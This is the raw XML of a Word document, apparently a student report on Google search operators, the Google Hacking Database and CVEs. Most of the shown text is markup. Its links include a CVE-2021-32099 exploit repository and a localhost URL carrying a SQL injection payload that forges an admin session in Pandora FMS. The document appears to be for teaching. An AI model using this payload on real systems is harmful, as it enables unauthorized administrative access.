          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABC6BA3" w14:textId="23648260" w:rsidR="009D764B" w:rsidRDefault="001C66A9" w:rsidP="001C66A9">
      <w:r>
        <w:t>These are some operators which d</w:t>
      </w:r>
      <w:r w:rsidR="009D764B">
        <w:t xml:space="preserve">o not mix with another in the same query, for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D764B">
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D764B">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00101978">
        <w:t>allintitle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00101978">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009D764B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D764B">
        <w:t>allintext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D764B">
        <w:t xml:space="preserve"> operators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C637895" w14:textId="31234BFA" w:rsidR="00D610F5" w:rsidRDefault="00D610F5" w:rsidP="001C66A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Rockwell" w:hAnsi="Rockwell"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32267429" wp14:editId="7F497123">
            <wp:extent cx="3975652" cy="3139659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1" t="12153" r="16269" b="14890"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3998239" cy="315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73C3" w14:textId="513AC3BA" w:rsidR="00D610F5" w:rsidRDefault="00D610F5" w:rsidP="001C66A9"/>
    <w:p w14:paraId="263D2A8F" w14:textId="66938597" w:rsidR="00357ADC" w:rsidRDefault="00D610F5" w:rsidP="001C66A9"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478E086" wp14:editId="6C4A5962">
            <wp:extent cx="5650074" cy="4304581"/>
            <wp:effectExtent l="0" t="0" r="825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8" t="31841" r="27969" b="6321"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5667350" cy="431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7882" w14:textId="77777777" w:rsidR="00357ADC" w:rsidRDefault="00357ADC" w:rsidP="001C66A9"/>
    <w:p w14:paraId="1023F3BF" w14:textId="4E4A901F" w:rsidR="00357ADC" w:rsidRDefault="00357ADC" w:rsidP="001C66A9"/>
    <w:p w14:paraId="1D87D5C6" w14:textId="039E1F8D" w:rsidR="00357ADC" w:rsidRPr="00043291" w:rsidRDefault="00D610F5" w:rsidP="00D610F5">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                     </w:t>
      </w:r>
      <w:r w:rsidR="00043291">
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r w:rsidR="00043291" w:rsidRPr="00043291">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thanx you</w:t>
      </w:r>
      <w:r w:rsidR="00043291">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="00043291" w:rsidRPr="00043291">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C415E85" w14:textId="3FEE4E44" w:rsidR="00D610F5" w:rsidRDefault="00D610F5" w:rsidP="00D610F5">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AB59CB" w14:textId="65A092A4" w:rsidR="009D764B" w:rsidRDefault="009D764B" w:rsidP="001C66A9"/>
    <w:p w14:paraId="5C268BDF" w14:textId="77777777" w:rsidR="009D764B" w:rsidRDefault="009D764B" w:rsidP="001C66A9"/>
    <w:p w14:paraId="68BEA0AD" w14:textId="74270554" w:rsidR="009D764B" w:rsidRDefault="009D764B" w:rsidP="001C66A9"/>
    <w:p w14:paraId="18046AB8" w14:textId="77777777" w:rsidR="009D764B" w:rsidRDefault="009D764B" w:rsidP="001C66A9"/>
    <w:p w14:paraId="7327CDF8" w14:textId="59159B5A" w:rsidR="009D764B" w:rsidRDefault="009D764B" w:rsidP="001C66A9"/>
    <w:p w14:paraId="2CF5BA11" w14:textId="77777777" w:rsidR="009D764B" w:rsidRPr="001C66A9" w:rsidRDefault="009D764B" w:rsidP="001C66A9"/>
    <w:p w14:paraId="08E1346A" w14:textId="77777777" w:rsidR="008B349E" w:rsidRPr="008B349E" w:rsidRDefault="008B349E" w:rsidP="008B349E"/>
    <w:p w14:paraId="2F49E62A" w14:textId="410F9E91" w:rsidR="008B349E" w:rsidRPr="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F42FB31" w14:textId="17AB4A77" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="21546B88" w14:textId="3EAE1201" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="36F582C9" w14:textId="03A72B5F" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="3F378087" w14:textId="4F4A8A8B" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="79B1C59E" w14:textId="33F73769" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="2E15781C" w14:textId="08AD9029" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="05801B09" w14:textId="1E99ED35" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="122DC1EE" w14:textId="0075795E" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="35BDBD93" w14:textId="4B1E939C" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="6F11997E" w14:textId="113A5E1A" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="0738D182" w14:textId="77777777" w:rsidR="008B349E" w:rsidRDefault="008B349E" w:rsidP="002766B5"/>
    <w:p w14:paraId="00C367B9" w14:textId="636EE5B1" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="002766B5"/>
    <w:p w14:paraId="306EAE11" w14:textId="77777777" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="002766B5"/>
    <w:p w14:paraId="3C5BC7D9" w14:textId="77777777" w:rsidR="002766B5" w:rsidRPr="002766B5" w:rsidRDefault="002766B5" w:rsidP="002766B5"/>
    <w:p w14:paraId="3BCEDFA9" w14:textId="37F728AF" w:rsidR="002766B5" w:rsidRDefault="002766B5" w:rsidP="00916592"/>
    <w:p w14:paraId="1FE0A60E" w14:textId="084F30D2" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="61109193" w14:textId="53AD9176" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="44B24CA2" w14:textId="0732CADB" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="429CEB88" w14:textId="19048E2F" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="5ECF6961" w14:textId="560A92F1" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="6EB4062F" w14:textId="0B5E22BA" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="3566F18B" w14:textId="494D2F45" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="311B58BD" w14:textId="01280901" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="77EE23A2" w14:textId="05D9E781" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="1393033A" w14:textId="09EF86DD" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="45158801" w14:textId="660F5F49" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="76C753F3" w14:textId="57EC88B6" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="28459CA3" w14:textId="1196EFFC" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="6681570F" w14:textId="0AF5C35A" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="11541290" w14:textId="6158E0FF" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="29BC89CE" w14:textId="40FF5E48" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="1FD0BDB6" w14:textId="260AA285" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="01099306" w14:textId="675A0453" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="0364D85F" w14:textId="4ECD68E3" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="393DA508" w14:textId="0CF0F236" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="1288ADFA" w14:textId="208717AE" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="79A4291A" w14:textId="29C9C1CF" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="3C1CE350" w14:textId="3B4947FC" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="055B52CF" w14:textId="1B8494E3" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="48507918" w14:textId="52426323" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="57E21240" w14:textId="16E3079B" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="1EA77D6F" w14:textId="1A83C0AD" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="4B836CE9" w14:textId="0BF60C1A" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="793AF2AC" w14:textId="657C9749" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="77C4AD73" w14:textId="4F3EFE20" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="3EA7FA73" w14:textId="4D3FEC09" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="284F0271" w14:textId="7A1D7579" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="5730ADA6" w14:textId="01829B8A" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="0A95B5A2" w14:textId="2C65B9AE" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="55912588" w14:textId="3C59C862" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="5B691E08" w14:textId="6AB20F37" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="4BFEA9EA" w14:textId="03C9564B" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="5E003E61" w14:textId="4A6605D9" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="46FB4447" w14:textId="30772798" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="6636B6DA" w14:textId="5C11B1B8" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="2DDBC898" w14:textId="63AB4682" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="3CBCDA85" w14:textId="3417EC5F" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="14D3BA01" w14:textId="19936267" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="4632B913" w14:textId="22F2D576" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="58F3D540" w14:textId="1D48D9BC" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="0ED5C0D7" w14:textId="3953ACC8" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="5A1842BB" w14:textId="6FC4E41C" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="6F7000C1" w14:textId="36D9CC3F" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="5C7D6886" w14:textId="521FBC23" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="2681744A" w14:textId="4F571219" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="5A5E3367" w14:textId="6AE6ECF4" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="381D341E" w14:textId="536536E4" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="6CF7BA6B" w14:textId="76B782CB" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="7921A38C" w14:textId="1A8C312A" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="0F46E31D" w14:textId="2D83949F" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="2BE95D5F" w14:textId="32AFD589" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="1E9FC250" w14:textId="71EE2CDC" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:p w14:paraId="593BDDCB" w14:textId="77777777" w:rsidR="008924E6" w:rsidRPr="00916592" w:rsidRDefault="008924E6" w:rsidP="00916592"/>
    <w:sectPr w:rsidR="008924E6" w:rsidRPr="009165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3A9"/>
    <w:rsid w:val="00043291"/>
    <w:rsid w:val="00101978"/>
    <w:rsid w:val="0015122C"/>
    <w:rsid w:val="001A03A9"/>
    <w:rsid w:val="001C66A9"/>
    <w:rsid w:val="002766B5"/>
    <w:rsid w:val="002C63F8"/>
    <w:rsid w:val="002C75C6"/>
    <w:rsid w:val="003243E0"/>
    <w:rsid w:val="00357ADC"/>
    <w:rsid w:val="00384197"/>
    <w:rsid w:val="003F41FD"/>
    <w:rsid w:val="00516322"/>
    <w:rsid w:val="006F3E1B"/>
    <w:rsid w:val="007152E8"/>
    <w:rsid w:val="007A2EED"/>
    <w:rsid w:val="007B6458"/>
    <w:rsid w:val="007F3A38"/>
    <w:rsid w:val="008924E6"/>
    <w:rsid w:val="008B349E"/>
    <w:rsid w:val="008F47A7"/>
    <w:rsid w:val="009062A6"/>
    <w:rsid w:val="00916592"/>
    <w:rsid w:val="009D764B"/>
    <w:rsid w:val="009F2C93"/>
    <w:rsid w:val="00A408FA"/>
    <w:rsid w:val="00B14653"/>
    <w:rsid w:val="00BC5980"/>
    <w:rsid w:val="00C86D3E"/>
    <w:rsid w:val="00CE7AEF"/>
    <w:rsid w:val="00D610F5"/>
    <w:rsid w:val="00EC5B2F"/>
    <w:rsid w:val="00F51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5FC49"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{81C066F1-60C4-4E52-9EE1-7849DFDC0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A03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03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8F47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47A7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7B645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ploit-db.com/google-hacking-databas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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/National_Cybersecurity_FFRDC" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org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Vulnerability_(computing)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/National_Cyber_Security_Division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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Information_security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github.com/ibnuuby/CVE-2021-32099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en.wikipedia.org/wiki/The_Mitre_Corporation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hyperlink" Target="https://en.wikipedia.org/wiki/The_Mitre_Corporation" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org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localhost:8000/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271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en.wikipedia.org/wiki/The_Mitre_Corpor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16</Pages>
  <Words>758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aswal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>abhishek aswal</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-26T10:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-27T07:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>